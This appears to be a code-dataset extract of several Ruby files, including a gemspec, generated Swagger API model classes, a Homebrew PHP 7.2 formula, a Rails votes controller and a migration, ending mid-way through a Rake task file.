hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
e277effb95921a69ffb05d9365b97056cd64295d | 958 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'zklib/version'
Gem::Specification.new do |spec|
spec.name = 'zklib'
spec.version = Zklib::VERSION
spec.platform = Gem::Platform::RUBY
spec.license = 'MIT'
spec.summary = 'Attendance machine client in Ruby'
spec.email = 'anhtrantuan.hcmc@gmail.com'
spec.homepage = 'https://github.com/anhtrantuan/zklib-ruby'
spec.description = 'Attendance machine client in Ruby'
spec.authors = ['Anh Tran']
spec.files = `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
spec.require_paths = ['lib']
spec.add_dependency 'bindata', '~> 2.3'
spec.add_development_dependency 'bundler', '~> 1.12'
spec.add_development_dependency 'rake', '~> 10.0'
spec.add_development_dependency 'minitest', '~> 5.0'
spec.add_development_dependency 'byebug', '~> 9.0'
end
| 34.214286 | 104 | 0.674322 |
037d12e4d38d490440b3889dad0d0a8684585d7d | 7,753 | =begin
#NSX-T Data Center Policy API
#VMware NSX-T Data Center Policy REST API
OpenAPI spec version: 3.1.0.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.19
=end
require 'date'
module NSXTPolicy
class ConsolidatedEffectiveIPAddressMemberListResult
# Link to this resource
attr_accessor :_self
# The server will populate this field when returing the resource. Ignored on PUT and POST.
attr_accessor :_links
# Schema for this resource
attr_accessor :_schema
# Opaque cursor to be used for getting next page of records (supplied by current result page)
attr_accessor :cursor
# If true, results are sorted in ascending order
attr_accessor :sort_ascending
# Field by which records are sorted
attr_accessor :sort_by
# Count of results found (across all pages), set only on first page
attr_accessor :result_count
# Paged Collection of site wise consolidated effective ip addresses for the given NSGroup
attr_accessor :results
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'_self' => :'_self',
:'_links' => :'_links',
:'_schema' => :'_schema',
:'cursor' => :'cursor',
:'sort_ascending' => :'sort_ascending',
:'sort_by' => :'sort_by',
:'result_count' => :'result_count',
:'results' => :'results'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'_self' => :'SelfResourceLink',
:'_links' => :'Array<ResourceLink>',
:'_schema' => :'String',
:'cursor' => :'String',
:'sort_ascending' => :'BOOLEAN',
:'sort_by' => :'String',
:'result_count' => :'Integer',
:'results' => :'Array<EffectiveIPInfo>'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'_self')
self._self = attributes[:'_self']
end
if attributes.has_key?(:'_links')
if (value = attributes[:'_links']).is_a?(Array)
self._links = value
end
end
if attributes.has_key?(:'_schema')
self._schema = attributes[:'_schema']
end
if attributes.has_key?(:'cursor')
self.cursor = attributes[:'cursor']
end
if attributes.has_key?(:'sort_ascending')
self.sort_ascending = attributes[:'sort_ascending']
end
if attributes.has_key?(:'sort_by')
self.sort_by = attributes[:'sort_by']
end
if attributes.has_key?(:'result_count')
self.result_count = attributes[:'result_count']
end
if attributes.has_key?(:'results')
if (value = attributes[:'results']).is_a?(Array)
self.results = value
end
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @results.nil?
invalid_properties.push('invalid value for "results", results cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @results.nil?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
_self == o._self &&
_links == o._links &&
_schema == o._schema &&
cursor == o.cursor &&
sort_ascending == o.sort_ascending &&
sort_by == o.sort_by &&
result_count == o.result_count &&
results == o.results
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[_self, _links, _schema, cursor, sort_ascending, sort_by, result_count, results].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = NSXTPolicy.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 29.256604 | 107 | 0.611376 |
1c4a6b795367df49f10dcfb2913b4b9e628de977 | 16,611 | class PhpAT72 < Formula
desc "General-purpose scripting language"
homepage "https://www.php.net/"
# Should only be updated if the new version is announced on the homepage, https://www.php.net/
url "https://www.php.net/distributions/php-7.2.27.tar.xz"
sha256 "7bd0fb9e3b63cfe53176d1f3565cd686f90b3926217158de5ba57091f49e4c32"
bottle do
sha256 "48f992816667bb5a68fa313c6fe038117a441a5e86eeafa98ec7c063777b0b3c" => :catalina
sha256 "2ab944e0812974fc02d97078953fcd33b740f0930225ccb9a855fda431477339" => :mojave
sha256 "1bf0f596a78b0ccb62e4fb9567ab24ccdf831a040974b96e5b45a175a05ce0d1" => :high_sierra
sha256 "70e35562cf2e1426d65dc48474050d7dc1c7b77eb4682d070449e6dfe5992bc8" => :x86_64_linux
end
keg_only :versioned_formula
depends_on "httpd" => [:build, :test]
depends_on "pkg-config" => :build
depends_on "apr"
depends_on "apr-util"
depends_on "argon2"
depends_on "aspell"
depends_on "autoconf"
depends_on "curl-openssl"
depends_on "freetds"
depends_on "freetype"
depends_on "gettext"
depends_on "glib"
depends_on "gmp"
depends_on "icu4c"
depends_on "jpeg"
depends_on "libpng"
depends_on "libpq"
depends_on "libsodium"
depends_on "libzip"
depends_on "openldap"
depends_on "openssl@1.1"
depends_on "sqlite"
depends_on "tidy-html5"
depends_on "unixodbc"
depends_on "webp"
unless OS.mac?
depends_on "xz" => :build
depends_on "libedit"
end
uses_from_macos "bzip2"
uses_from_macos "libxml2"
uses_from_macos "libxslt"
uses_from_macos "zlib"
# PHP build system incorrectly links system libraries
# see https://github.com/php/php-src/pull/3472
patch :DATA if OS.mac?
def install
# Ensure that libxml2 will be detected correctly in older MacOS
if MacOS.version == :el_capitan || MacOS.version == :sierra
ENV["SDKROOT"] = MacOS.sdk_path
end
# buildconf required due to system library linking bug patch
system "./buildconf", "--force"
inreplace "configure" do |s|
s.gsub! "APACHE_THREADED_MPM=`$APXS_HTTPD -V | grep 'threaded:.*yes'`",
"APACHE_THREADED_MPM="
s.gsub! "APXS_LIBEXECDIR='$(INSTALL_ROOT)'`$APXS -q LIBEXECDIR`",
"APXS_LIBEXECDIR='$(INSTALL_ROOT)#{lib}/httpd/modules'"
s.gsub! "-z `$APXS -q SYSCONFDIR`",
"-z ''"
# apxs will interpolate the @ in the versioned prefix: https://bz.apache.org/bugzilla/show_bug.cgi?id=61944
s.gsub! "LIBEXECDIR='$APXS_LIBEXECDIR'",
"LIBEXECDIR='" + "#{lib}/httpd/modules".gsub("@", "\\@") + "'"
end
# Update error message in apache sapi to better explain the requirements
# of using Apache http in combination with php if the non-compatible MPM
# has been selected. Homebrew has chosen not to support being able to
# compile a thread safe version of PHP and therefore it is not
# possible to recompile as suggested in the original message
inreplace "sapi/apache2handler/sapi_apache2.c",
"You need to recompile PHP.",
"Homebrew PHP does not support a thread-safe php binary. "\
"To use the PHP apache sapi please change "\
"your httpd config to use the prefork MPM"
inreplace "sapi/fpm/php-fpm.conf.in", ";daemonize = yes", "daemonize = no"
# Required due to icu4c dependency
ENV.cxx11
config_path = etc/"php/#{php_version}"
# Prevent system pear config from inhibiting pear install
(config_path/"pear.conf").delete if (config_path/"pear.conf").exist?
# Prevent homebrew from harcoding path to sed shim in phpize script
ENV["lt_cv_path_SED"] = "sed"
# Each extension that is built on Mojave needs a direct reference to the
# sdk path or it won't find the headers
if OS.mac?
headers_path = "=#{MacOS.sdk_path_if_needed}/usr"
else
headers_path = ""
end
args = %W[
--prefix=#{prefix}
--localstatedir=#{var}
--sysconfdir=#{config_path}
--with-config-file-path=#{config_path}
--with-config-file-scan-dir=#{config_path}/conf.d
--with-pear=#{pkgshare}/pear
--enable-bcmath
--enable-calendar
--enable-dba
--enable-exif
--enable-ftp
--enable-fpm
--enable-intl
--enable-mbregex
--enable-mbstring
--enable-mysqlnd
--enable-opcache-file
--enable-pcntl
--enable-phpdbg
--enable-phpdbg-webhelper
--enable-shmop
--enable-soap
--enable-sockets
--enable-sysvmsg
--enable-sysvsem
--enable-sysvshm
--enable-wddx
--enable-zip
--with-apxs2=#{Formula["httpd"].opt_bin}/apxs
--with-curl=#{Formula["curl-openssl"].opt_prefix}
--with-fpm-user=_www
--with-fpm-group=_www
--with-freetype-dir=#{Formula["freetype"].opt_prefix}
--with-gd
--with-gettext=#{Formula["gettext"].opt_prefix}
--with-gmp=#{Formula["gmp"].opt_prefix}
--with-iconv#{headers_path}
--with-icu-dir=#{Formula["icu4c"].opt_prefix}
--with-jpeg-dir=#{Formula["jpeg"].opt_prefix}
--with-kerberos#{headers_path}
--with-layout=GNU
--with-ldap=#{Formula["openldap"].opt_prefix}
--with-ldap-sasl#{headers_path}
--with-libzip
--with-mhash#{headers_path}
--with-mysql-sock=/tmp/mysql.sock
--with-mysqli=mysqlnd
--with-openssl=#{Formula["openssl@1.1"].opt_prefix}
--with-password-argon2=#{Formula["argon2"].opt_prefix}
--with-pdo-dblib=#{Formula["freetds"].opt_prefix}
--with-pdo-mysql=mysqlnd
--with-pdo-odbc=unixODBC,#{Formula["unixodbc"].opt_prefix}
--with-pdo-pgsql=#{Formula["libpq"].opt_prefix}
--with-pdo-sqlite=#{Formula["sqlite"].opt_prefix}
--with-pgsql=#{Formula["libpq"].opt_prefix}
--with-pic
--with-png-dir=#{Formula["libpng"].opt_prefix}
--with-pspell=#{Formula["aspell"].opt_prefix}
--with-sodium=#{Formula["libsodium"].opt_prefix}
--with-sqlite3=#{Formula["sqlite"].opt_prefix}
--with-tidy=#{Formula["tidy-html5"].opt_prefix}
--with-unixODBC=#{Formula["unixodbc"].opt_prefix}
--with-webp-dir=#{Formula["webp"].opt_prefix}
--with-xmlrpc
]
if OS.mac?
args << "--enable-dtrace"
args << "--with-zlib#{headers_path}"
args << "--with-bz2#{headers_path}"
args << "--with-ndbm#{headers_path}"
args << "--with-libedit#{headers_path}"
args << "--with-libxml-dir#{headers_path}"
args << "--with-xsl#{headers_path}"
else
args << "--disable-dtrace"
args << "--with-zlib=#{Formula["zlib"].opt_prefix}"
args << "--with-bz2=#{Formula["bzip2"].opt_prefix}"
args << "--with-libedit=#{Formula["libedit"].opt_prefix}"
args << "--with-libxml-dir=#{Formula["libxml2"].opt_prefix}"
args << "--with-xsl=#{Formula["libxslt"].opt_prefix}"
args << "--without-ldap-sasl"
args << "--without-ndbm"
args << "--without-gdbm"
end
system "./configure", *args
system "make"
system "make", "install"
# Allow pecl to install outside of Cellar
extension_dir = Utils.popen_read("#{bin}/php-config --extension-dir").chomp
orig_ext_dir = File.basename(extension_dir)
inreplace bin/"php-config", lib/"php", prefix/"pecl"
inreplace "php.ini-development", %r{; ?extension_dir = "\./"},
"extension_dir = \"#{HOMEBREW_PREFIX}/lib/php/pecl/#{orig_ext_dir}\""
# Use OpenSSL cert bundle
inreplace "php.ini-development", /; ?openssl\.cafile=/,
"openssl.cafile = \"#{etc}/openssl@1.1/cert.pem\""
inreplace "php.ini-development", /; ?openssl\.capath=/,
"openssl.capath = \"#{etc}/openssl@1.1/certs\""
config_files = {
"php.ini-development" => "php.ini",
"sapi/fpm/php-fpm.conf" => "php-fpm.conf",
"sapi/fpm/www.conf" => "php-fpm.d/www.conf",
}
config_files.each_value do |dst|
dst_default = config_path/"#{dst}.default"
rm dst_default if dst_default.exist?
end
config_path.install config_files
unless (var/"log/php-fpm.log").exist?
(var/"log").mkpath
touch var/"log/php-fpm.log"
end
end
def post_install
pear_prefix = pkgshare/"pear"
pear_files = %W[
#{pear_prefix}/.depdblock
#{pear_prefix}/.filemap
#{pear_prefix}/.depdb
#{pear_prefix}/.lock
]
%W[
#{pear_prefix}/.channels
#{pear_prefix}/.channels/.alias
].each do |f|
chmod 0755, f
pear_files.concat(Dir["#{f}/*"])
end
chmod 0644, pear_files
# Custom location for extensions installed via pecl
pecl_path = HOMEBREW_PREFIX/"lib/php/pecl"
ln_s pecl_path, prefix/"pecl" unless (prefix/"pecl").exist?
extension_dir = Utils.popen_read("#{bin}/php-config --extension-dir").chomp
php_basename = File.basename(extension_dir)
php_ext_dir = opt_prefix/"lib/php"/php_basename
# fix pear config to install outside cellar
pear_path = HOMEBREW_PREFIX/"share/pear@#{php_version}"
cp_r pkgshare/"pear/.", pear_path
{
"php_ini" => etc/"php/#{php_version}/php.ini",
"php_dir" => pear_path,
"doc_dir" => pear_path/"doc",
"ext_dir" => pecl_path/php_basename,
"bin_dir" => opt_bin,
"data_dir" => pear_path/"data",
"cfg_dir" => pear_path/"cfg",
"www_dir" => pear_path/"htdocs",
"man_dir" => HOMEBREW_PREFIX/"share/man",
"test_dir" => pear_path/"test",
"php_bin" => opt_bin/"php",
}.each do |key, value|
value.mkpath if /(?<!bin|man)_dir$/.match?(key)
system bin/"pear", "config-set", key, value, "system"
end
system bin/"pear", "update-channels"
%w[
opcache
].each do |e|
ext_config_path = etc/"php/#{php_version}/conf.d/ext-#{e}.ini"
extension_type = (e == "opcache") ? "zend_extension" : "extension"
if ext_config_path.exist?
inreplace ext_config_path,
/#{extension_type}=.*$/, "#{extension_type}=#{php_ext_dir}/#{e}.so"
else
ext_config_path.write <<~EOS
[#{e}]
#{extension_type}="#{php_ext_dir}/#{e}.so"
EOS
end
end
end
def caveats
<<~EOS
To enable PHP in Apache add the following to httpd.conf and restart Apache:
LoadModule php7_module #{opt_lib}/httpd/modules/libphp7.so
<FilesMatch \\.php$>
SetHandler application/x-httpd-php
</FilesMatch>
Finally, check DirectoryIndex includes index.php
DirectoryIndex index.php index.html
The php.ini and php-fpm.ini file can be found in:
#{etc}/php/#{php_version}/
EOS
end
def php_version
version.to_s.split(".")[0..1].join(".")
end
plist_options :manual => "php-fpm"
def plist; <<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>KeepAlive</key>
<true/>
<key>Label</key>
<string>#{plist_name}</string>
<key>ProgramArguments</key>
<array>
<string>#{opt_sbin}/php-fpm</string>
<string>--nodaemonize</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>WorkingDirectory</key>
<string>#{var}</string>
<key>StandardErrorPath</key>
<string>#{var}/log/php-fpm.log</string>
</dict>
</plist>
EOS
end
test do
assert_match /^Zend OPcache$/, shell_output("#{bin}/php -i"),
"Zend OPCache extension not loaded"
# Test related to libxml2 and
# https://github.com/Homebrew/homebrew-core/issues/28398
if OS.mac?
assert_includes MachO::Tools.dylibs("#{bin}/php"),
"#{Formula["libpq"].opt_lib}/libpq.5.dylib"
end
system "#{sbin}/php-fpm", "-t"
system "#{bin}/phpdbg", "-V"
system "#{bin}/php-cgi", "-m"
# Prevent SNMP extension to be added
assert_no_match /^snmp$/, shell_output("#{bin}/php -m"),
"SNMP extension doesn't work reliably with Homebrew on High Sierra"
begin
require "socket"
server = TCPServer.new(0)
port = server.addr[1]
server_fpm = TCPServer.new(0)
port_fpm = server_fpm.addr[1]
server.close
server_fpm.close
expected_output = /^Hello world!$/
(testpath/"index.php").write <<~EOS
<?php
echo 'Hello world!' . PHP_EOL;
var_dump(ldap_connect());
EOS
main_config = <<~EOS
Listen #{port}
ServerName localhost:#{port}
DocumentRoot "#{testpath}"
ErrorLog "#{testpath}/httpd-error.log"
ServerRoot "#{Formula["httpd"].opt_prefix}"
PidFile "#{testpath}/httpd.pid"
LoadModule authz_core_module lib/httpd/modules/mod_authz_core.so
LoadModule unixd_module lib/httpd/modules/mod_unixd.so
LoadModule dir_module lib/httpd/modules/mod_dir.so
DirectoryIndex index.php
EOS
(testpath/"httpd.conf").write <<~EOS
#{main_config}
LoadModule mpm_prefork_module lib/httpd/modules/mod_mpm_prefork.so
LoadModule php7_module #{lib}/httpd/modules/libphp7.so
<FilesMatch \\.(php|phar)$>
SetHandler application/x-httpd-php
</FilesMatch>
EOS
(testpath/"fpm.conf").write <<~EOS
[global]
daemonize=no
[www]
listen = 127.0.0.1:#{port_fpm}
pm = dynamic
pm.max_children = 5
pm.start_servers = 2
pm.min_spare_servers = 1
pm.max_spare_servers = 3
EOS
(testpath/"httpd-fpm.conf").write <<~EOS
#{main_config}
LoadModule mpm_event_module lib/httpd/modules/mod_mpm_event.so
LoadModule proxy_module lib/httpd/modules/mod_proxy.so
LoadModule proxy_fcgi_module lib/httpd/modules/mod_proxy_fcgi.so
<FilesMatch \\.(php|phar)$>
SetHandler "proxy:fcgi://127.0.0.1:#{port_fpm}"
</FilesMatch>
EOS
pid = fork do
exec Formula["httpd"].opt_bin/"httpd", "-X", "-f", "#{testpath}/httpd.conf"
end
sleep 3
assert_match expected_output, shell_output("curl -s 127.0.0.1:#{port}")
Process.kill("TERM", pid)
Process.wait(pid)
fpm_pid = fork do
exec sbin/"php-fpm", "-y", "fpm.conf"
end
pid = fork do
exec Formula["httpd"].opt_bin/"httpd", "-X", "-f", "#{testpath}/httpd-fpm.conf"
end
sleep 3
assert_match expected_output, shell_output("curl -s 127.0.0.1:#{port}")
ensure
if pid
Process.kill("TERM", pid)
Process.wait(pid)
end
if fpm_pid
Process.kill("TERM", fpm_pid)
Process.wait(fpm_pid)
end
end
end
end
__END__
diff --git a/acinclude.m4 b/acinclude.m4
index 168c465f8d..6c087d152f 100644
--- a/acinclude.m4
+++ b/acinclude.m4
@@ -441,7 +441,11 @@ dnl
dnl Adds a path to linkpath/runpath (LDFLAGS)
dnl
AC_DEFUN([PHP_ADD_LIBPATH],[
- if test "$1" != "/usr/$PHP_LIBDIR" && test "$1" != "/usr/lib"; then
+ case "$1" in
+ "/usr/$PHP_LIBDIR"|"/usr/lib"[)] ;;
+ /Library/Developer/CommandLineTools/SDKs/*/usr/lib[)] ;;
+ /Applications/Xcode*.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/*/usr/lib[)] ;;
+ *[)]
PHP_EXPAND_PATH($1, ai_p)
ifelse([$2],,[
_PHP_ADD_LIBPATH_GLOBAL([$ai_p])
@@ -452,8 +456,8 @@ AC_DEFUN([PHP_ADD_LIBPATH],[
else
_PHP_ADD_LIBPATH_GLOBAL([$ai_p])
fi
- ])
- fi
+ ]) ;;
+ esac
])
dnl
@@ -487,7 +491,11 @@ dnl add an include path.
dnl if before is 1, add in the beginning of INCLUDES.
dnl
AC_DEFUN([PHP_ADD_INCLUDE],[
- if test "$1" != "/usr/include"; then
+ case "$1" in
+ "/usr/include"[)] ;;
+ /Library/Developer/CommandLineTools/SDKs/*/usr/include[)] ;;
+ /Applications/Xcode*.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/*/usr/include[)] ;;
+ *[)]
PHP_EXPAND_PATH($1, ai_p)
PHP_RUN_ONCE(INCLUDEPATH, $ai_p, [
if test "$2"; then
@@ -495,8 +503,8 @@ AC_DEFUN([PHP_ADD_INCLUDE],[
else
INCLUDES="$INCLUDES -I$ai_p"
fi
- ])
- fi
+ ]) ;;
+ esac
])
dnl internal, don't use
@@ -2411,7 +2419,8 @@ AC_DEFUN([PHP_SETUP_ICONV], [
fi
if test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.a ||
- test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.$SHLIB_SUFFIX_NAME
+ test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.$SHLIB_SUFFIX_NAME ||
+ test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.tbd
then
PHP_CHECK_LIBRARY($iconv_lib_name, libiconv, [
found_iconv=yes
| 32.380117 | 113 | 0.622479 |
338599393909bbf7d3a364da68ad5eebbf8d617b | 624 | module LikeDislike
class VotesController < ActionController::Base
before_action :find_likeable
before_action :authenticate_user!
respond_to :js
def create
@likeable.liked_by current_user
render json: render_votes
end
def destroy
@likeable.disliked_by current_user
render json: render_votes
end
private
def render_votes
[@likeable.cached_votes_up, @likeable.cached_votes_down]
end
def find_likeable
@likeable_type = params[:likeable_type].classify
@likeable = @likeable_type.constantize.find(params[:likeable_id])
end
end
end | 21.517241 | 71 | 0.711538 |
0342cd01f4a33fe734c0346c797ccb2fde696d35 | 267 | module Bootstrap2Helpers
module Bootstrap
module Rails
require 'bootstrap_2_helpers/bootstrap/rails/engine' if defined?(Rails)
end
end
end
require 'bootstrap_2_helpers/version'
require 'bootstrap_2_helpers/bootstrap/rails/engine' if defined?(Rails)
| 26.7 | 77 | 0.790262 |
ff1127f40527bc3540cc887fd420752f66fa80ec | 1,331 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'aws-sdk-core'
require 'aws-sigv4'
require_relative 'aws-sdk-sms/types'
require_relative 'aws-sdk-sms/client_api'
require_relative 'aws-sdk-sms/client'
require_relative 'aws-sdk-sms/errors'
require_relative 'aws-sdk-sms/resource'
require_relative 'aws-sdk-sms/customizations'
# This module provides support for AWS Server Migration Service. This module is available in the
# `aws-sdk-sms` gem.
#
# # Client
#
# The {Client} class provides one method for each API operation. Operation
# methods each accept a hash of request parameters and return a response
# structure.
#
# sms = Aws::SMS::Client.new
# resp = sms.create_app(params)
#
# See {Client} for more information.
#
# # Errors
#
# Errors returned from AWS Server Migration Service are defined in the
# {Errors} module and all extend {Errors::ServiceError}.
#
# begin
# # do stuff
# rescue Aws::SMS::Errors::ServiceError
# # rescues all AWS Server Migration Service API errors
# end
#
# See {Errors} for more information.
#
# @!group service
module Aws::SMS
GEM_VERSION = '1.37.0'
end
| 24.648148 | 96 | 0.732532 |
ff3b8f2ba9bed63fefbc73ec5623e131e2fb127d | 183 | class CreateContacts < ActiveRecord::Migration[5.2]
def change
create_table :contacts do |t|
t.timestamps
t.text :name
t.text :phone_number
end
end
end
| 16.636364 | 51 | 0.655738 |
1143549338174dcddbf503e6e8c2b48a00e8ed13 | 6,659 | =begin
#Selling Partner API for Direct Fulfillment Shipping
#The Selling Partner API for Direct Fulfillment Shipping provides programmatic access to a direct fulfillment vendor's shipping data.
OpenAPI spec version: v1
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.33
=end
require 'date'
module AmzSpApi::VendorDirectFulfillmentShippingV1
class SubmitShipmentConfirmationsRequest
attr_accessor :shipment_confirmations
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'shipment_confirmations' => :'shipmentConfirmations'
}
end
# Attribute type mapping.
def self.openapi_types
{
:'shipment_confirmations' => :'Object'
}
end
# List of attributes with nullable: true
def self.openapi_nullable
Set.new([
])
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `AmzSpApi::VendorDirectFulfillmentShippingV1::SubmitShipmentConfirmationsRequest` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `AmzSpApi::VendorDirectFulfillmentShippingV1::SubmitShipmentConfirmationsRequest`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'shipment_confirmations')
if (value = attributes[:'shipment_confirmations']).is_a?(Array)
self.shipment_confirmations = value
end
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
shipment_confirmations == o.shipment_confirmations
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[shipment_confirmations].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
elsif attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
self.send("#{key}=", nil)
end
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
AmzSpApi::VendorDirectFulfillmentShippingV1.const_get(type).build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
if value.nil?
is_nullable = self.class.openapi_nullable.include?(attr)
next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
end
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end end
end
| 31.861244 | 257 | 0.64319 |
e888405015226f071e0a0ceb1ab67fc5826ddad7 | 899 | unless ENV['RAILS_ENV'] == "production"
namespace :spec do
desc 'Run small specs (lib, model, controller)'
task :small => %w[spec:lib spec:models spec:controllers]
desc 'Run large specs (requests).'
task :large => %w[spec:requests]
desc 'Run all specs (including buster).'
task :all => %w[spec js:test]
namespace :coverage do
